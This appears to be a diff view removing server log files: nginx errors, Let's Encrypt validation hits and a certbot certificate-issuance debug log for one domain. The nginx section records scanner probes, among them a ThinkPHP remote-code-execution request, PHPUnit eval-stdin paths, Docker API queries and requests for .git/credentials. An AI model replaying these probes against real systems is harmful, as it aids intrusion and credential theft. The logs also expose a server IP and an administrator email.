2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:31 [error] 963#963: *100770 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:31 [error] 963#963: *100770 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:31 [error] 963#963: *100770 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:17:25 [error] 963#963: *100773 open() "/var/www/html/.git/credentials" failed (2: No such file or directory), client: 195.178.110.246, server: localhost-nginx-proxy-manager, request: "GET /.git/credentials HTTP/1.1", host: "222.117.41.51"
2026/02/18 17:55:39 [error] 963#963: *100791 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 85.11.167.7, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51"
2026/02/18 18:49:16 [error] 979#979: *100805 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 19:48:55 [error] 972#972: *100824 open() "/var/www/html/ip" failed (2: No such file or directory), client: 87.121.84.172, server: localhost-nginx-proxy-manager, request: "GET http://httpbin.org/ip HTTP/1.1", host: "httpbin.org"
2026/02/18 20:24:48 [error] 973#973: *100856 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 21:03:20 [error] 979#979: *102465 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 115.231.78.11, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51:80"

View File

@@ -1,21 +0,0 @@
[14/Feb/2026:22:37:03 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 23.178.112.212] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:22:37:04 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 18.222.135.176] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:22:37:04 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 13.215.201.135] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:22:37:04 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 56.228.19.145] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:22:37:05 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 54.218.246.213] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:22:59:04 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 23.178.112.108] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:22:59:05 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 13.229.225.246] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:22:59:06 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 44.249.164.249] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:22:59:06 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 13.51.200.205] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:22:59:07 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 18.222.8.98] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:23:36:13 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 23.178.112.211] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:23:36:15 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 18.222.30.235] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:23:36:16 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 18.138.231.223] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:23:36:16 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 44.249.164.249] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[14/Feb/2026:23:36:17 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 13.48.49.154] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[15/Feb/2026:01:51:53 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 23.178.112.107] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[15/Feb/2026:01:51:54 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 47.129.179.70] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[15/Feb/2026:01:51:54 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 13.61.182.40] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[15/Feb/2026:01:51:54 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 34.211.230.189] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[15/Feb/2026:01:51:55 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 18.218.54.218] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[15/Feb/2026:01:52:03 +0000] 404 - HEAD http git.hanmocnn.co.kr "/" [Client 192.64.113.146] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" "-"

View File

@@ -1,409 +0,0 @@
2026-02-15 01:53:21,924:DEBUG:certbot._internal.main:certbot version: 5.3.0
2026-02-15 01:53:21,925:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
2026-02-15 01:53:21,925:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-7', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'git.hanmocnn.co.kr']
2026-02-15 01:53:21,925:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2026-02-15 01:53:21,939:DEBUG:certbot._internal.log:Root logging level set at 30
2026-02-15 01:53:21,940:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-15 01:53:21,940:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
Interfaces: Authenticator, Plugin
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffff93ff0390>
Prep: True
2026-02-15 01:53:21,941:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffff93ff0390> and installer None
2026-02-15 01:53:21,941:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
2026-02-15 01:53:22,173:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
2026-02-15 01:53:22,174:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
2026-02-15 01:53:22,177:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
2026-02-15 01:53:22,749:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
2026-02-15 01:53:22,750:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:53:22 GMT
Content-Type: application/json
Content-Length: 1033
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
"meta": {
"caaIdentities": [
"letsencrypt.org"
],
"profiles": {
"classic": "https://letsencrypt.org/docs/profiles#classic",
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
},
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
"website": "https://letsencrypt.org"
},
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
"qw5aGjGdqUs": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
}
2026-02-15 01:53:22,751:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for git.hanmocnn.co.kr
2026-02-15 01:53:22,755:DEBUG:acme.client:Requesting fresh nonce
2026-02-15 01:53:22,756:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
2026-02-15 01:53:22,931:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
2026-02-15 01:53:22,931:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:53:22 GMT
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtf371F2dHjmpzxyQJyT53Irn_ns9AHyC1ZS59P7cma1yM
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
2026-02-15 01:53:22,932:DEBUG:acme.client:Storing nonce: qLPTsdtf371F2dHjmpzxyQJyT53Irn_ns9AHyC1ZS59P7cma1yM
2026-02-15 01:53:22,932:DEBUG:acme.client:JWS payload:
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "git.hanmocnn.co.kr"\n }\n ]\n}'
2026-02-15 01:53:22,938:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjM3MUYyZEhqbXB6eHlRSnlUNTNJcm5fbnM5QUh5QzFaUzU5UDdjbWExeU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
"signature": "WyHKdWrWbQ3LclhqvkOiUGsvL-CRTBoVdK5ZhXGtBeDbrprDu_5gAF-rZmoTaxKICx7JLIJmM6x5eGmUqtQPRkz-pdGzbKVYOH8tNRZmS_UlP4Xme44N2b8XsV1LfEREEi4gE7Xoltvv1WZVTa5pH2OMAV0W2qivo_rw2pvjJcAUBvbJ-LjWw8bwWgZA-V9D8y1QCNnnnygWv7MzYlqyqQdFdoFtLR_jULsyPkLr0_O1VYQ63kfGQvlu7LcIx6CigQytrQe6xjCQMfagSFHTbCUomU95CAsGkKCGG8zdcY5gxAGq9aUtCDh1ckj1i7JlxT7VG8Gw94Fm1-3xyoIvVg",
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImdpdC5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0"
}
2026-02-15 01:53:23,207:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 350
2026-02-15 01:53:23,208:DEBUG:acme.client:Received response:
HTTP 201
Server: nginx
Date: Sun, 15 Feb 2026 01:53:23 GMT
Content-Type: application/json
Content-Length: 350
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716
Replay-Nonce: QkEzerAfewKqCm7D8TxtCV9igelQqU_6LxnLw93BuTLlqGVqyto
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "ready",
"expires": "2026-02-22T01:53:23Z",
"identifiers": [
{
"type": "dns",
"value": "git.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716"
}
2026-02-15 01:53:23,208:DEBUG:acme.client:Storing nonce: QkEzerAfewKqCm7D8TxtCV9igelQqU_6LxnLw93BuTLlqGVqyto
2026-02-15 01:53:23,208:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:53:23,213:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZmV3S3FDbTdEOFR4dENWOWlnZWxRcVVfNkx4bkx3OTNCdVRMbHFHVnF5dG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
"signature": "aRcOzVryk7N-epoq94qMQaMnoZRc7CwSkyd9ho6LopgW7DQ9gEmTr8Wz_tImoO_K94ggGlP4u9A77STJT3qzgT7WfBRV_fbtX65jr721Gczj7p-uqUQZXgc0trtw86vR47hXaEHgiNAwcO3XfgsP_V2uTr6h3M2vDw_89Aogg7YRVJruSAIK4sOkUbAOV0JjtxMwPO8ks-tnfpJQ0w-XW-wJ7B9ipQG9h9vWDZAvK2MOgZOoqJVQjUy1_urnkpXXmE-083hikkbzsyLXXAa-P5GcW6KgHV-frj0ejgQVJMLjh6U4YmyH-7HImx7kCQD_rtQ6qQSVgC6Q4SUNBx7hGA",
"payload": ""
}
2026-02-15 01:53:23,391:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 777
2026-02-15 01:53:23,392:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:53:23 GMT
Content-Type: application/json
Content-Length: 777
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAfRd3ApU9wqlGKFrr8ynXUod788KPNiE_LCow1T_uNR3k
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "git.hanmocnn.co.kr"
},
"status": "valid",
"expires": "2026-03-17T01:51:57Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
"status": "valid",
"validated": "2026-02-15T01:51:51Z",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0",
"validationRecord": [
{
"url": "http://git.hanmocnn.co.kr/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0",
"hostname": "git.hanmocnn.co.kr",
"port": "80",
"addressesResolved": [
"222.117.41.51"
],
"addressUsed": "222.117.41.51"
}
]
}
]
}
2026-02-15 01:53:23,392:DEBUG:acme.client:Storing nonce: QkEzerAfRd3ApU9wqlGKFrr8ynXUod788KPNiE_LCow1T_uNR3k
2026-02-15 01:53:23,392:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE7ZAcanp3QlMenYln\nHTD7y/aMNQsYPRK/GPbY52fqKJTuDETZiujJiW2ouXb36OiEHOeqiBh0CeEBas1C\n+6FetlNbP9eEZFeW4EAyUJpSyY8fzUrbz1+74Gy/NO1zCCSeoDAwLgYJKoZIhvcN\nAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0E\nAwIDaQAwZgIxAIX8GWa4RGMhJGbNLWSR+POe/0WtswWV8x3F0RAfRNUSKtajsegi\nS8p0E8O7yzY4egIxAP4lsygfSMg8agBLYJwIv1VEiPTgp/zFAbI/AZoZqarecqWW\n2FJMR0Y6bW7QwCaCTA==\n-----END CERTIFICATE REQUEST-----\n', form='pem')
2026-02-15 01:53:23,393:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-15 01:54:53.393497
2026-02-15 01:53:23,394:DEBUG:acme.client:JWS payload:
b'{\n "csr": "MIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE7ZAcanp3QlMenYlnHTD7y_aMNQsYPRK_GPbY52fqKJTuDETZiujJiW2ouXb36OiEHOeqiBh0CeEBas1C-6FetlNbP9eEZFeW4EAyUJpSyY8fzUrbz1-74Gy_NO1zCCSeoDAwLgYJKoZIhvcNAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0EAwIDaQAwZgIxAIX8GWa4RGMhJGbNLWSR-POe_0WtswWV8x3F0RAfRNUSKtajsegiS8p0E8O7yzY4egIxAP4lsygfSMg8agBLYJwIv1VEiPTgp_zFAbI_AZoZqarecqWW2FJMR0Y6bW7QwCaCTA"\n}'
2026-02-15 01:53:23,398:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZlJkM0FwVTl3cWxHS0Zycjh5blhVb2Q3ODhLUE5pRV9MQ293MVRfdU5SM2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwNDA5MjA2NzE2In0",
"signature": "Bi6hElJl4Oyw45hxpguXUi4m-kHZxLB2eQwSvZ_zg6ud2TTcA3XEHKrII60OeSqKdIEQi6OPJiRjkzd1ezPGXdkJLpCJ6MROCMBuuzZ_txS5Yx5uwnwLe7cX2VXZ3cf4L5HjYM_3mYt9kPO4ByiXhELIMeALK7ngR5_2y8ej-wXhYpl-lm95-ZrqV7oxVSt3Mx4uNAgG8-kP3_-WQVjGppZzzVmRWFZ3plfzut2Cp9lRNDfi_TvQkQ4NXjK0WbXJDxvti07fkwjXutpEpbYz4heqp-PaxRY09KMGbenbjj0O2vkbD_RA9Zzv0nswGLrvVmS4pe5wFiOKpur3-l1EJQ",
"payload": "ewogICJjc3IiOiAiTUlJQktUQ0Jyd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFN1pBY2FucDNRbE1lbllsbkhURDd5X2FNTlFzWVBSS19HUGJZNTJmcUtKVHVERVRaaXVqSmlXMm91WGIzNk9pRUhPZXFpQmgwQ2VFQmFzMUMtNkZldGxOYlA5ZUVaRmVXNEVBeVVKcFN5WThmelVyYnoxLTc0R3lfTk8xekNDU2VvREF3TGdZSktvWklodmNOQVFrT01TRXdIekFkQmdOVkhSRUVGakFVZ2hKbmFYUXVhR0Z1Ylc5amJtNHVZMjh1YTNJd0NnWUlLb1pJemowRUF3SURhUUF3WmdJeEFJWDhHV2E0UkdNaEpHYk5MV1NSLVBPZV8wV3Rzd1dWOHgzRjBSQWZSTlVTS3RhanNlZ2lTOHAwRThPN3l6WTRlZ0l4QVA0bHN5Z2ZTTWc4YWdCTFlKd0l2MVZFaVBUZ3BfekZBYklfQVpvWnFhcmVjcVdXMkZKTVIwWTZiVzdRd0NhQ1RBIgp9"
}
2026-02-15 01:53:24,814:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480409206716 HTTP/1.1" 200 454
2026-02-15 01:53:24,815:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:53:24 GMT
Content-Type: application/json
Content-Length: 454
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716
Replay-Nonce: QkEzerAf-62VIy5uF6WKUM_0j4Ve47MTMI-BkVhP5zXT1TfCzrk
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-22T01:53:23Z",
"identifiers": [
{
"type": "dns",
"value": "git.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2"
}
2026-02-15 01:53:24,815:DEBUG:acme.client:Storing nonce: QkEzerAf-62VIy5uF6WKUM_0j4Ve47MTMI-BkVhP5zXT1TfCzrk
2026-02-15 01:53:25,816:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:53:25,820:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZi02MlZJeTV1RjZXS1VNXzBqNFZlNDdNVE1JLUJrVmhQNXpYVDFUZkN6cmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwNDA5MjA2NzE2In0",
"signature": "vMnBNE3IKK2s3YQ5jOEAYzwlZrq0I89Cz-8t911nhsBrHCuDTbtQuSMQayO0c3OVf4jBxJLJuEYYPYmEPZ679TcNLQTi8Fl8e2SKqaH8-CYrN29R1zgsAYE_9JbhZIQA_ereyzJqyqoQo7UFNwoDmbZmMopZoKOChHfFt8vcaShIEL_7VVZSLJ3Mfi-BuPg0Ma0plB86pstM-3T0xoc2p0c5uDPagrreaGwj0Phkt_-Lu5sLDIFXMUpnZxsFLknAW8pv6F3AsT_qA1BQgD460593TH54HbFERLM2avWrArxwf4u05wVD9MG8-9Aoi-sREAvGv5MojORDx51tDaSqxA",
"payload": ""
}
2026-02-15 01:53:25,999:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480409206716 HTTP/1.1" 200 454
2026-02-15 01:53:26,000:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:53:25 GMT
Content-Type: application/json
Content-Length: 454
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716
Replay-Nonce: qLPTsdtf7nABj_xfpx_vC8SHnUvfzzrQZwNnFbBx2xeMVgUvgqM
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-22T01:53:23Z",
"identifiers": [
{
"type": "dns",
"value": "git.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2"
}
2026-02-15 01:53:26,000:DEBUG:acme.client:Storing nonce: qLPTsdtf7nABj_xfpx_vC8SHnUvfzzrQZwNnFbBx2xeMVgUvgqM
2026-02-15 01:53:26,000:DEBUG:acme.client:JWS payload:
b''
